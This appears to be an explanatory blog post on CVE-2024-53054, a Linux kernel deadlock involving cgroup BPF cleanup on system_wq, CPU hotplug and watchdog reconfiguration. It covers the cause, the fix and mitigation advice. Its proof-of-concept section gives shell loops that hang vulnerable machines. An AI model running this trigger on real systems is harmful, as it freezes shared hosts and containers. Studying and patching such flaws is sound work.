Summary:
A high-impact issue in the Linux kernel, tracked as CVE-2024-53054, was found in the way the kernel handled cgroup BPF (Berkeley Packet Filter) resource cleanup. Triggered by a race between resource deletion and CPU hotplug events, this vulnerability could lead to a system deadlock, meaning multiple kernel threads get permanently stuck and the machine becomes unresponsive. Here, we explain what caused it, how it can be reproduced, and how it was fixed.

What is the Problem?

When many cpuset cgroups are deleted, the kernel frees up their BPF resources _asynchronously_ by scheduling cleanup work in the global system_wq workqueue. If this global queue is overwhelmed (filled with hundreds of cleanup tasks), it blocks other critical maintenance jobs, eventually creating a deadlock where key locks (like cgroup_mutex and cpu_hotplug_lock) are never released.

Symptom:

A system log showing kworker threads blocked for many seconds, similar to:

INFO: task kworker/0:0:8 blocked for more than 327 seconds.
Workqueue: events cgroup_bpf_release
Call Trace:
 __schedule+0x5a2/0x205
 ...
 cgroup_bpf_release+0xcf/0x4d
 ...
 ...
 mutex_lock(&cgroup_mutex);
 ..blocking...
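
To check whether a machine is showing this signature, the hung-task reports can be filtered out of the kernel log. The following is a minimal sketch, not an official tool: the function name count_blocked_bpf_release is hypothetical, and it assumes the log layout shown above, where a "Workqueue:" line follows each "blocked for more than" line.

```shell
#!/usr/bin/env bash
# Hypothetical helper: count hung-task reports whose worker was running
# cgroup_bpf_release. Reads kernel log text on stdin and prints the count.
count_blocked_bpf_release() {
  awk '
    # Start of a hung-task report: remember that we are inside one.
    /INFO: task .* blocked for more than [0-9]+ seconds/ { pending = 1; next }
    # The first Workqueue line after it names the function that was running.
    pending && /Workqueue:/ {
      if ($0 ~ /cgroup_bpf_release/) hits++
      pending = 0
    }
    END { print hits + 0 }
  '
}

# Typical use on a live system (reading the kernel log may require root):
#   dmesg | count_blocked_bpf_release
```

A count that keeps growing while cgroups are being deleted suggests the cleanup workers are stuck rather than merely slow.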

CPU and Watchdog Events:

- The system (or user) triggers frequent CPU on/offline actions (hotplug) and watchdog reconfiguration (for example, writes to watchdog_thresh).

Lock Contention:

- CPU hotplug operations (like taking CPUs offline) require exclusive access to cpu_hotplug_lock (write lock).
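- BPF cleanup takes cgroup_mutex; cgroup deletion holds cgroup_mutex and also needs cpu_hotplug_lock (read lock).
- These locks are acquired by different tasks in different orders, and the waits form a cycle: the cgroup_bpf_release workers occupying every active system_wq slot wait for cgroup_mutex; the cgroup destruction work holding cgroup_mutex waits for cpu_hotplug_lock (read); that read is queued behind a pending CPU-offline writer; the writer waits for the watchdog reconfiguration, which holds the read lock; and the watchdog reconfiguration waits for its own work item on system_wq, which cannot start because no slot is free. This is a classic deadlock.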

System Death:

- No more work can complete, so system maintenance, user tasks, and kernel resource cleanup all freeze.
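
The circular wait described above can be modelled as a tiny wait-for graph. This is only an illustrative sketch: the task labels are invented for the example (they are not kernel identifiers), and each task is assumed to wait on exactly one other task, which simplifies what the kernel actually does.

```shell
#!/usr/bin/env bash
# Simplified wait-for model (requires bash 4+ for associative arrays).
# Labels are illustrative only:
#   bpf_release_workers -> need cgroup_mutex, held by cgroup_destroy_work
#   cgroup_destroy_work -> needs the hotplug read lock, queued behind cpu_offline
#   cpu_offline         -> needs the write lock, held for reading by watchdog_reconfig
#   watchdog_reconfig   -> needs a free system_wq slot, all taken by bpf_release_workers
declare -A waits_for=(
  [bpf_release_workers]=cgroup_destroy_work
  [cgroup_destroy_work]=cpu_offline
  [cpu_offline]=watchdog_reconfig
  [watchdog_reconfig]=bpf_release_workers
)

# Follow the chain from a starting task; succeed if it leads back to the start.
has_cycle() {
  local start=$1 current=$1 steps=0
  while [[ -n ${waits_for[$current]:-} ]]; do
    current=${waits_for[$current]}
    [[ $current == "$start" ]] && return 0
    # Guard against loops that do not pass through the starting task.
    (( ++steps > ${#waits_for[@]} )) && return 1
  done
  return 1
}

if has_cycle bpf_release_workers; then
  echo "deadlock: wait-for chain loops back to its start"
else
  echo "no cycle: some task can still make progress"
fi
```

Removing any single edge breaks the cycle in this model, which is why taking the cleanup work off the shared queue is enough to let the other tasks proceed.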

Visualization

system_wq: [cgroup_bpf_release x 256 active] -> [more in inactive queue]
    |
    +-> Watchdog work (waiting)
    |
    +-> CPU hotplug (waiting for lock)
    |
    +-> cgroup_destroy_wq (waiting for lock)

Proof-of-Concept: How To Trigger It

If you’re running a vulnerable kernel and want to see the issue (NOT recommended on production machines!):

# Create, then delete, a large batch of cpuset cgroups
for i in {1..250}; do
  mkdir /sys/fs/cgroup/cpuset/test$i
done
for i in {1..250}; do
  rmdir /sys/fs/cgroup/cpuset/test$i
done

# Hotplug CPUs on and off in a loop (as root)
while true; do
  echo 0 > /sys/devices/system/cpu/cpu1/online
  echo 1 > /sys/devices/system/cpu/cpu1/online
done &

# Randomly change watchdog threshold to force reconfiguration
while true; do
  echo $((RANDOM % 50 + 10)) > /proc/sys/kernel/watchdog_thresh
done &

Result:
After a few cycles the kernel may hang, and dmesg will fill with blocked workqueue messages.

Exploit Potential

While this bug does not allow for _privilege escalation_ or code execution, it is a severe *denial-of-service* vector:

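- A local user with permission to create/delete cgroups can supply the flood of cleanup work; combined with CPU hotplug and watchdog reconfiguration (which normally require root, or which the system triggers itself), this can hang the machine.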
- In shared hosting, containers, or VMs using cgroup isolation, a malicious user could easily freeze all processes.

How Was It Fixed?

Solution:
Linux maintainers patched the kernel by moving the cgroup_bpf_release work to a dedicated workqueue (cgroup_bpf_destroy_wq). This means:

- BPF cleanup tasks no longer block the core system_wq, freeing up room for critical work (like hotplug and watchdog).

Relevant code change

// Old code: schedules on system_wq (shared by all sorts of jobs)
INIT_WORK(&work, cgroup_bpf_release);
queue_work(system_wq, &work);

// Fixed code: uses a dedicated workqueue
static struct workqueue_struct *cgroup_bpf_destroy_wq;
cgroup_bpf_destroy_wq = alloc_workqueue("cgroup_bpf_destroy", ..., ...);
INIT_WORK(&work, cgroup_bpf_release);
queue_work(cgroup_bpf_destroy_wq, &work);

Upstream Linux Kernel Commit (fix):

cgroup/bpf: use a dedicated workqueue for cgroup bpf destruction

Security advisory:

CVE-2024-53054 on NVD

LKML discussion thread:

https://lore.kernel.org/all/20240604185101.15167-1-kernel.patches@xxxxxxxxx/

What Should You Do?

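- Patch Immediately: If you manage Linux systems, update to a kernel that contains this fix. A release date is only a rough guide (the CVE was published in November 2024), so confirm against your distribution's advisory for CVE-2024-53054 or check that the commit named above is included.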
- Reduce cgroup churn: Avoid large-scale batch create/delete cgroup workloads on unpatched kernels.
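
One way to read the "reduce churn" advice is to delete cgroups in small batches with a pause in between, so that release work is queued gradually rather than all at once. The helper below is a hypothetical sketch (the name rmdir_batched, the batch size, and the pause are all assumptions); a pause does not guarantee that earlier cleanup has finished, so this is no substitute for the patched kernel.

```shell
#!/usr/bin/env bash
# Hypothetical helper: remove directories in small batches, sleeping between
# batches. Prints the number of directories removed.
# Usage: rmdir_batched <batch_size> <pause_seconds> <dir>...
rmdir_batched() {
  local batch_size=$1 pause=$2
  shift 2
  local count=0 dir
  for dir in "$@"; do
    rmdir -- "$dir" || return 1
    # After every full batch, give queued cleanup work time to drain.
    if (( ++count % batch_size == 0 )); then
      sleep "$pause"
    fi
  done
  echo "$count"
}

# Example (values are arbitrary assumptions, tune for your workload):
#   rmdir_batched 50 1 /sys/fs/cgroup/cpuset/test*
```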

Bottom Line

*CVE-2024-53054* is a great lesson in how heavy background cleanup work in the kernel can threaten reliability, especially when crucial locks are involved. If you run multi-user Linux environments or rely on high availability, keep your systems patched and watch those workqueues!


*This post is exclusive and tries to simplify a complex kernel issue for all audiences. If you're a developer or sysadmin, feel free to dive into the commit and references above for a deeper technical understanding.*

Timeline

Published on: 11/19/2024 18:15:25 UTC
Last modified on: 11/22/2024 17:11:42 UTC